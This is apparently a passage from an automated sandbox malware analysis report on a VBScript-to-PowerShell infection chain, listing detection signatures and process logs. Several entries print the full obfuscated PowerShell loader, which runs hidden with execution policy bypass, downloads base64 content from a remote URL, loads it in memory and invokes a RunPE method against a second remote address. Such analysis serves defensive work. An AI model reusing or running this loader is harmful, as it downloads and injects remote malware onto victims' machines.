              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1754168405.000001A61E429000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000003.00000002.1787469124.000001A636B6B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: dbpdbtem.pdb source: powershell.exe, 00000003.00000002.1754168405.000001A61E429000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: e.pdb+ source: powershell.exe, 00000003.00000002.1787469124.000001A636B6B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdbp source: powershell.exe, 00000003.00000002.1787469124.000001A636B6B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000003.00000002.1788155155.000001A636EF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.1770505012.000001A62F7FE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000003.00000002.1787469124.000001A636B6B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.pdb# source: powershell.exe, 00000003.00000002.1787469124.000001A636B6B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 50e96378b6e77999stem.pdb source: powershell.exe, 00000003.00000002.1787469124.000001A636B6B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1787469124.000001A636B3F000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              VBScript performs obfuscated calls to suspicious functions
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKyd", "0", "false");
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
              Obfuscated command line found
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')"Jump to behavior
              Suspicious powershell command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B7500AD pushad ; iretd 1_2_00007FFD9B7500C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B7436F2 pushad ; retf 3_2_00007FFD9B7437CD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B744724 push esp; retf 3_2_00007FFD9B744759
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B745E75 push eax; ret 3_2_00007FFD9B745E79
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B7400AD pushad ; iretd 3_2_00007FFD9B7400C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B813414 pushfd ; ret 3_2_00007FFD9B813415
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B817C2E push esp; ret 3_2_00007FFD9B817C2F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B817FAB push ecx; ret 3_2_00007FFD9B817FAC
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B817A0E push esi; ret 3_2_00007FFD9B817A10
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B817A06 push ss; ret 3_2_00007FFD9B817A07
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B816DC9 push ebx; iretd 3_2_00007FFD9B816DCA
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
